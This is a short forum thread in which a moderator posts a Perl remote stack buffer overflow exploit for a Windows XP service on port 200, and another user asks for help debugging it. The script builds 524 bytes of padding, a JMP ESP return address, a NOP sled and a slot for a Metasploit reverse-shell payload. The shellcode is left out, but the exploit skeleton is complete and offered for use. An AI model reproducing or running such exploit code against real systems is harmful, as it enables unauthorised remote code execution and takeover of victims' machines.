
Thread: help in writing exploits stack overflow on xp sp2

  1. #21 KMDave (Moderator), Join Date Jan 2010, Posts 2,281

    Try this code, just change the EIP so that it points to a correct "JMP ESP". Mine will most likely not work. You can also check the DB on the metasploit site which will provide you with the necessary address.
    #!/usr/bin/perl
    #
    # Connect to the target service on port 200 and send the overflow buffer.

    use IO::Socket;

    $sock = IO::Socket::INET->new(PeerAddr => '<target IP>',
                                  PeerPort => '200',
                                  Proto    => 'tcp')
        or die "connect failed: $!";

    $eip = "\x47\x74\xD2\x77"; # JMP ESP (change this address for your target)

    # windows/shell_reverse_tcp - 287 bytes
    # http://www.metasploit.com
    # EXITFUNC=seh, LPORT=4444, LHOST=XXX.XXX.XXX.XXX
    # Removed the shellcode. Just use msfpayload to create one.
    $sc = ""; # placeholder: put the generated shellcode here

    $pattern = "A" x 524;     # padding up to the saved return address
    $pattern .= $eip;         # overwrite the saved return address with JMP ESP
    $pattern .= "\x90" x 20;  # NOP sled
    $pattern .= $sc;          # shellcode (ESP points here after the return)

    print $sock $pattern;

    while (<$sock>) {
        print;
    }
    Tiocfaidh ár lá

  2. #22 Just burned his ISO, Join Date Jan 2007, Posts 9

    I tried to run the program in XP SP1. As the return address I used the address of a stack adjustment that will move further down the stack, I mean pop ebx, ret.

    I see EIP overwritten by 90909090 and the error thrown is that this address is not readable.
    Please suggest something on this.

    Quote Originally Posted by KMDave
    Try this code, just change the EIP so that it points to a correct "JMP ESP". Mine will most likely not work. You can also check the DB on the metasploit site which will provide you with the necessary address.
